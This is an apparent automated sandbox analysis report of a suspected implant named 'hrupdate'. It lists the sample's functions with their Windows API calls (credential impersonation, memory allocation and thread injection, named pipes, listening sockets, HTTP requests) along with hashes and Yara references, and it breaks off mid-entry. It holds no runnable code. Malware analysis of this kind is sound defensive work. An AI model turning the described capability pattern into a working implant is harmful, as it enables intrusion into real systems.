                                      • Instruction Fuzzy Hash: AC21B332540209BBEF115F61CC49ABF3B6DEF41265F198018F809A6251FBB1AD119F64
                                      Function 04698D88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,04698FB9,C2E8296A,83FFFFD9,7591E010,046990F0), ref: 04698DBA
                                      • GetLastError.KERNEL32 ref: 04698DCC
                                      • _memset.LIBCMT ref: 04698E15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastLogonProcessWith_memset
                                      • String ID: sysnative$system32
                                      • API String ID: 2584212486-2461298002
                                      • Opcode ID: 5e930242b40a44de7735de1a2425dcf8396591b31e7c8447afad6e6cca29e646
                                      • Instruction ID: b03aed80adcb0cb0c8dd355d3ddbde5ae23858669d7d6c5252d6d008781b8854
                                      • Opcode Fuzzy Hash: 5e930242b40a44de7735de1a2425dcf8396591b31e7c8447afad6e6cca29e646
                                      • Instruction Fuzzy Hash: 0F312776600211ABDF22AF64DC18BE73BADEB1A300F184055FA85D7212FAB5ED548B94
                                      Function 0469D481 Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • htonl.WS2_32 ref: 0469D49E
                                      • htons.WS2_32(?), ref: 0469D4AE
                                      • socket.WS2_32(00000002,00000002,00000000), ref: 0469D4C4
                                      • closesocket.WS2_32(00000000), ref: 0469D4D1
                                      • bind.WS2_32(00000000,?,00000010), ref: 0469D4FF
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0469D516
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                      • String ID:
                                      • API String ID: 3910169428-0
                                      • Opcode ID: b608402f0ceaf5de0d6ddf9a3e6a2abbbb2ebac2acc26c0e05e3ac3f990a3b4d
                                      • Instruction ID: 29edf621c81ae3822ce1c77d1eb85b2dac61e6b1e8a5e717e30629a135fdee56
                                      • Opcode Fuzzy Hash: b608402f0ceaf5de0d6ddf9a3e6a2abbbb2ebac2acc26c0e05e3ac3f990a3b4d
                                      • Instruction Fuzzy Hash: 8C11B271A003146AEB10ABB89C45BAEB6ECDF09728F10453AF654E71C0F6B4BD4587A9
                                      Function 04697BE7 Relevance: 9.1, APIs: 6, Instructions: 68sleepnetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 04697BF9
                                      • Sleep.KERNEL32(000003E8), ref: 04697C69
                                      • GetTickCount.KERNEL32 ref: 04697C6F
                                      • Sleep.KERNEL32(000003E8), ref: 04697C82
                                      • closesocket.WS2_32(00000000), ref: 04697C89
                                      • send.WS2_32(00000000,?,?,00000000), ref: 04697C9C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountSleepTick$closesocketsend
                                      • String ID:
                                      • API String ID: 1472970430-0
                                      • Opcode ID: f2b0f623d8a3b2b5517e8a24d1167eaab5473cd4e2462c4c36e0e43509a8618c
                                      • Instruction ID: 42e67b664ccca51f4fe1d63ffa24afad1dbe62de2607edc6a9a339574a644663
                                      • Opcode Fuzzy Hash: f2b0f623d8a3b2b5517e8a24d1167eaab5473cd4e2462c4c36e0e43509a8618c
                                      • Instruction Fuzzy Hash: C8118472D00218EFEF01ABF4DC808DD7BBCEF04225F10053AE211A6190FAB5AA449B55
                                      Function 0469D39F Relevance: 9.1, APIs: 6, Instructions: 54networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0469D3B7
                                      • htons.WS2_32(?), ref: 0469D3D3
                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0469D3EC
                                      • closesocket.WS2_32(00000000), ref: 0469D3F7
                                      • bind.WS2_32(00000000,?,00000010), ref: 0469D405
                                      • listen.WS2_32(00000000,?), ref: 0469D413
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: bindclosesockethtonsioctlsocketlistensocket
                                      • String ID:
                                      • API String ID: 1767165869-0
                                      • Opcode ID: a218659402dad6ae6a894665ed8e242990da67fb562982b30a923339fbc82cb0
                                      • Instruction ID: 4ce2826a0eb83b8b0692cd9a29b941caa7a0627244ab93692df6b54550c99809
                                      • Opcode Fuzzy Hash: a218659402dad6ae6a894665ed8e242990da67fb562982b30a923339fbc82cb0
                                      • Instruction Fuzzy Hash: 8E01B531600628B7DF116FA88C05AEFBBADDF42755F204126FA40E6181F7B4AD4187E9
                                      Function 046A43CB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 046A4070: RevertToSelf.ADVAPI32(00000100,046A4609,00000000,?,?,04695B6E,?,00000000,00000000,00000000,00000100,00000100), ref: 046A4088
                                      • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,046DAF5C), ref: 046A43EB
                                      • GetLastError.KERNEL32 ref: 046A43F5
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,046990F0,?,04698F09,046990F0,?,00000400), ref: 0469764B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,046990F0,04698F09,?,04698F09,046990F0,?,00000400,?,?,?,?,046990F0), ref: 04697664
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                        • Part of subcall function 04695A19: _vwprintf.LIBCMT ref: 04695A23
                                        • Part of subcall function 04695A19: _vswprintf_s.LIBCMT ref: 04695A47
                                        • Part of subcall function 04695A58: _memset.LIBCMT ref: 04695A66
                                      • ImpersonateLoggedOnUser.ADVAPI32 ref: 046A440F
                                      • GetLastError.KERNEL32 ref: 046A4419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc$ByteCharErrorLastMultiUserWide$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
                                      • String ID: %s\%s
                                      • API String ID: 744593125-4073750446
                                      • Opcode ID: 6910ab402f794f729f7ded9293b5aaf242aea12156ae8fc37feec006016cce3d
                                      • Instruction ID: ccfba1401f2a7f1d426fe30e7b5d51865ee29736d1ed3f9d2c765171c6f7bc3a
                                      • Opcode Fuzzy Hash: 6910ab402f794f729f7ded9293b5aaf242aea12156ae8fc37feec006016cce3d
                                      • Instruction Fuzzy Hash: 0631A7B2D05208BBEF017FE0EC45EAA3BADEB04719F144028B90495251FBB96D11DFA5
                                      Function 046B655E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 046BA36D
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 046BA382
                                      • UnhandledExceptionFilter.KERNEL32(046C1C54), ref: 046BA38D
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 046BA3A9
                                      • TerminateProcess.KERNEL32(00000000), ref: 046BA3B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 52fd3d9ecdd2c7950539492786b6b91943a51f075130d0451df8e56cd78ea6ad
                                      • Instruction ID: 61b659febe48617ed39fc266c94dc79d65c4f930be13487bb974748655bc391f
                                      • Opcode Fuzzy Hash: 52fd3d9ecdd2c7950539492786b6b91943a51f075130d0451df8e56cd78ea6ad
                                      • Instruction Fuzzy Hash: D721DFB9D022059FDB00DF69F545AA43BB4FB08308F58B01AE4898BB41F77DACA18F45
                                      Function 046A4FA4 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 046A4FB6
                                      • closesocket.WS2_32(00000000), ref: 046A4FC3
                                      • htons.WS2_32(?), ref: 046A4FD4
                                      • bind.WS2_32(00000000,?,00000010), ref: 046A4FEB
                                      • listen.WS2_32(00000000,00000078), ref: 046A4FFC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: bindclosesockethtonslistensocket
                                      • String ID:
                                      • API String ID: 564772725-0
                                      • Opcode ID: bcc18c4c3e267716dc01509656a40a2512f6f55d19c0d3266e71207be3a5b7c9
                                      • Instruction ID: f56052b6a3a9c912b0d63ac5f8b9134470556e8872c11b244d7f0af1e8acae78
                                      • Opcode Fuzzy Hash: bcc18c4c3e267716dc01509656a40a2512f6f55d19c0d3266e71207be3a5b7c9
                                      • Instruction Fuzzy Hash: D2F0D135950A1476EB107BB49C0AFEE3228AF41328F404305F961A91D2FBF4B9559FEA
                                      Function 046987F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 04698851
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04698874
                                      • GetLastError.KERNEL32 ref: 0469887E
                                        • Part of subcall function 04695A19: _vwprintf.LIBCMT ref: 04695A23
                                        • Part of subcall function 04695A19: _vswprintf_s.LIBCMT ref: 04695A47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                                      • String ID: %s
                                      • API String ID: 2004037343-620797490
                                      • Opcode ID: 295375800ba6e8334805cf54146f7c0022d252f57c9064e51e3577d7dd4e99f2
                                      • Instruction ID: 0b4034de3eb981c660dbd838bf88d0ff8544fad32bb119a8ffb1648c8c900f76
                                      • Opcode Fuzzy Hash: 295375800ba6e8334805cf54146f7c0022d252f57c9064e51e3577d7dd4e99f2
                                      • Instruction Fuzzy Hash: B4116072910129BBEF11AFA5DD449EFBBFCEF05294F100426FA05F2150E675EE048AB1
                                      Function 046A2E65 Relevance: 6.2, APIs: 4, Instructions: 178nativethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,046A3FFF,00000000,00000000,000000FF,00000080,00000000,00000000,?,?,046949A6), ref: 046A2FA2
                                      • NtCreateThreadEx.NTDLL(046949A6,001FFFFF,00000000,?,?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 046A2FC4
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$CreateCurrentProcessThread
                                      • String ID:
                                      • API String ID: 4175059785-0
                                      • Opcode ID: 3abcc3247656768b8e43eb87e453ade64a3f0051260e519a4e2bda0c75d2cd32
                                      • Instruction ID: 1fc068066a1ba788218a192ec4e9e91f86b9fe1f03acc9344beda5f210f34abe
                                      • Opcode Fuzzy Hash: 3abcc3247656768b8e43eb87e453ade64a3f0051260e519a4e2bda0c75d2cd32
                                      • Instruction Fuzzy Hash: 9441A9B1A425107BEB716E51DC45DAB3EDCEF267A4F000018F90C55281F679AD60CAF5
                                      Function 046A29D5 Relevance: 6.2, APIs: 4, Instructions: 157nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,046DA64C,00000000,?,?,?,046960AF,00000000,046DA64C,?,00000001,000002F0,?,00000000,0469632B,?), ref: 046A2AFB
                                      • NtProtectVirtualMemory.NTDLL(?,?,00000000,?,046DA64C), ref: 046A2B15
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$CurrentMemoryProcessProtectVirtual
                                      • String ID:
                                      • API String ID: 1381917366-0
                                      • Opcode ID: 636f89647d5b4160c591606c8d343990e60d36ffe2b3a16cb5e5a761644cb557
                                      • Instruction ID: a32caa4f4055f59c499a920c7b251280046cfe82024362468d9e02f97209876c
                                      • Opcode Fuzzy Hash: 636f89647d5b4160c591606c8d343990e60d36ffe2b3a16cb5e5a761644cb557
                                      • Instruction Fuzzy Hash: 3941C3B1A41105BBEF25AF50DC85DAF3FADEB25398F000058F90892241F679ED64CFA0
                                      Function 046A2824 Relevance: 6.2, APIs: 4, Instructions: 152memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(000002F0,?,00000000,?,?,?,046963B2,00000000,00000000,000002F0,00003000,?,?,00000008,00000001), ref: 046A2941
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,00003000,00000000,046963B2), ref: 046A295C
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$AllocateCurrentMemoryProcessVirtual
                                      • String ID:
                                      • API String ID: 2672565004-0
                                      • Opcode ID: 2cf6eb09f3ec50b11d8bda6da1bc1e1f562faef97b06f1cf1b5341f6f18f20fe
                                      • Instruction ID: c17751aee24e2125a37cc2996851835b9c02b3ee250b0cd6843eb87cf3b52d3a
                                      • Opcode Fuzzy Hash: 2cf6eb09f3ec50b11d8bda6da1bc1e1f562faef97b06f1cf1b5341f6f18f20fe
                                      • Instruction Fuzzy Hash: ED418EB1941114BFEF25EF91EC55DAF3FADEF267A4B000059F80892251F675AD20CBA1
                                      Function 0469CBF1 Relevance: 6.1, APIs: 4, Instructions: 63sleepnetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469CC00
                                      • Sleep.KERNEL32(000003E8), ref: 0469CC50
                                      • GetTickCount.KERNEL32 ref: 0469CC56
                                      • WSAGetLastError.WS2_32 ref: 0469CC5C
                                        • Part of subcall function 0469CBAB: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469CBBD
                                        • Part of subcall function 0469C387: _memset.LIBCMT ref: 0469C3A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$ErrorLastSleep_memsetioctlsocket
                                      • String ID:
                                      • API String ID: 3301373915-0
                                      • Opcode ID: d544e62be36a6ef1609ec2d1daef69ca0f48bf3d134521a633aaa4cedd1dde19
                                      • Instruction ID: 9630df9f5c5f6e3369aa8bc4d7a560af1dccb0615774062850fbbfec87591e58
                                      • Opcode Fuzzy Hash: d544e62be36a6ef1609ec2d1daef69ca0f48bf3d134521a633aaa4cedd1dde19
                                      • Instruction Fuzzy Hash: CE11C673C00109ABEF107BB4EC419EE7BEDDB44268F240026F600A7190FAA4BD865699
                                      Function 046A459B Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,75922E90,?,?,?,0469CE90), ref: 046A45CE
                                      • CheckTokenMembership.ADVAPI32(00000000,?,0469CE90,?,?,?,0469CE90), ref: 046A45E3
                                      • FreeSid.ADVAPI32(?,?,?,?,0469CE90), ref: 046A45F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 7e347504e0d86d94d12591252da590fb3b9e00735db146bfb12d0c5806d19d96
                                      • Instruction ID: 28aecef368c446d64161f4a3cc402406cba399f4f6448f0df2d0835e1a7ea6b4
                                      • Opcode Fuzzy Hash: 7e347504e0d86d94d12591252da590fb3b9e00735db146bfb12d0c5806d19d96
                                      • Instruction Fuzzy Hash: 6C011D76945288FEDB01DBE88984AEDBF78EB25200F44449AA501A3242E6709B18DB25
                                      Function 046BD4E0 Relevance: 4.4, Strings: 3, Instructions: 612COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $<$abcdefghijklmnop
                                      • API String ID: 0-2431890337
                                      • Opcode ID: 589e3b946b326a213d4398395d5a4a76cdec11e31719adc70cc6f86360464dbb
                                      • Instruction ID: d9c681dbf20f4a5a32e6981efed085aa9c8399d8eb2984a7a34d40883d5f65e3
                                      • Opcode Fuzzy Hash: 589e3b946b326a213d4398395d5a4a76cdec11e31719adc70cc6f86360464dbb
                                      • Instruction Fuzzy Hash: 5A52E375A001199FDB48CF69C491AADBBF1EF8D300F14C16AE865AB342D638E951CFA4
                                      Function 046988A5 Relevance: 1.5, APIs: 1, Instructions: 38pipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateNamedPipeA.KERNEL32(?,00000003,00000004,00000002,00000000,00000000,00000000,00000000), ref: 046988F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateNamedPipe
                                      • String ID:
                                      • API String ID: 2489174969-0
                                      • Opcode ID: 7e470d41ff7f4ecef460ff3326896921b70e676bb5c1fc7d5176bfa38c013841
                                      • Instruction ID: 1b36b2448f3ba59b15b1ac194b6a9cd96d63b68f1aa23ae3d608c75ac6c4d310
                                      • Opcode Fuzzy Hash: 7e470d41ff7f4ecef460ff3326896921b70e676bb5c1fc7d5176bfa38c013841
                                      • Instruction Fuzzy Hash: 96F0C8B1901308AFEB10AE79ECC6EA63FECD301368F105329E2A5D21D1F2B95E954E55
                                      Function 006737E2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000037EE,00672EF1), ref: 006737E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 6d83936a5cac999094e381013522a0316588b0eb75638898f96f2eb3d9c08fa0
                                      • Instruction ID: e816ec5407db5c66093fbdab87839a89d5dd311e9e037b9041c27011566325c2
                                      • Opcode Fuzzy Hash: 6d83936a5cac999094e381013522a0316588b0eb75638898f96f2eb3d9c08fa0
                                      • Instruction Fuzzy Hash:
                                      Function 00F3BE95 Relevance: .1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction ID: f3ea1702f16f66b654406b2db58bf769a7b374e6192fb745449aff962af0302e
                                      • Opcode Fuzzy Hash: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction Fuzzy Hash: 935190B4E00219DFCB08CF98C490AEEBBB1FF48314F248199D915A7355D335AA41DFA4
                                      Function 00F3CA68 Relevance: .1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction ID: ca775c2d2ae5e55d2f098c1ef13b4c81aba538394422430142d7cbee6581e8b3
                                      • Opcode Fuzzy Hash: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction Fuzzy Hash: CC518E74E0421A9FCB04CF98C590AAEFBB2FF88314F248199D915BB355D334AA51DFA4
                                      Function 046ABBDA Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc
                                      • String ID:
                                      • API String ID: 1579825452-0
                                      • Opcode ID: 60347157e8862350854cb8fdef7e5684c47df712c36dee72f341f05ac62c99b7
                                      • Instruction ID: f8b4f33ff3c25f901edc1ae847d9a93088ba89c2733969efea3bd651abded616
                                      • Opcode Fuzzy Hash: 60347157e8862350854cb8fdef7e5684c47df712c36dee72f341f05ac62c99b7
                                      • Instruction Fuzzy Hash: CF410AB2E00209AFDB14DFA8C881AAEB7B5EF48314F15816DE956E7341E634BD51CF50
                                      Function 0469D902 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 210networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • htonl.WS2_32(0469489E), ref: 0469D93C
                                      • select.WS2_32(00000000,?,?,?,?), ref: 0469D9A0
                                      • __WSAFDIsSet.WS2_32(34E85900,?), ref: 0469D9BC
                                      • accept.WS2_32(34E85900,00000000,00000000), ref: 0469D9D1
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469D9E4
                                        • Part of subcall function 0469D308: _malloc.LIBCMT ref: 0469D30F
                                        • Part of subcall function 0469D308: GetTickCount.KERNEL32 ref: 0469D32F
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                        • Part of subcall function 0469590F: htonl.WS2_32(00000000), ref: 04695915
                                        • Part of subcall function 04695A58: _memset.LIBCMT ref: 04695A66
                                      • __WSAFDIsSet.WS2_32(34E85900,?), ref: 0469DA71
                                      • accept.WS2_32(34E85900,00000000,00000000), ref: 0469DA83
                                      • closesocket.WS2_32(0469489E), ref: 0469DB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
                                      • String ID: d
                                      • API String ID: 4083423528-2564639436
                                      • Opcode ID: ccd8bad9d14b531e1dd462e352f7f1c75f6216a422f7f351c727a737f57b4245
                                      • Instruction ID: 9d5d6954305dd087135ad36ba1067e21338098f7b4de2faadcf920553c1ae922
                                      • Opcode Fuzzy Hash: ccd8bad9d14b531e1dd462e352f7f1c75f6216a422f7f351c727a737f57b4245
                                      • Instruction Fuzzy Hash: 9F7125B1800609ABEF21EFA4CD44AABB7FCEF44304F1045AAE556E6650F7B0BE458B54
                                      Function 04696DB9 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 196networksleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 04696DE4
                                      • _memset.LIBCMT ref: 04696DF9
                                      • __snprintf.LIBCMT ref: 04696E65
                                      • _memset.LIBCMT ref: 04696E73
                                      • __snprintf.LIBCMT ref: 04696E8F
                                      • __snprintf.LIBCMT ref: 04696EAE
                                      • __snprintf.LIBCMT ref: 04696F4C
                                      • __snprintf.LIBCMT ref: 04696F63
                                      • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,*/*,046DA668), ref: 04696FA0
                                      • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 04696FC9
                                      • InternetCloseHandle.WININET(00000000), ref: 04696FDB
                                      • Sleep.KERNEL32(000001F4), ref: 04696FE2
                                      • InternetCloseHandle.WININET(00000000), ref: 04696FF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
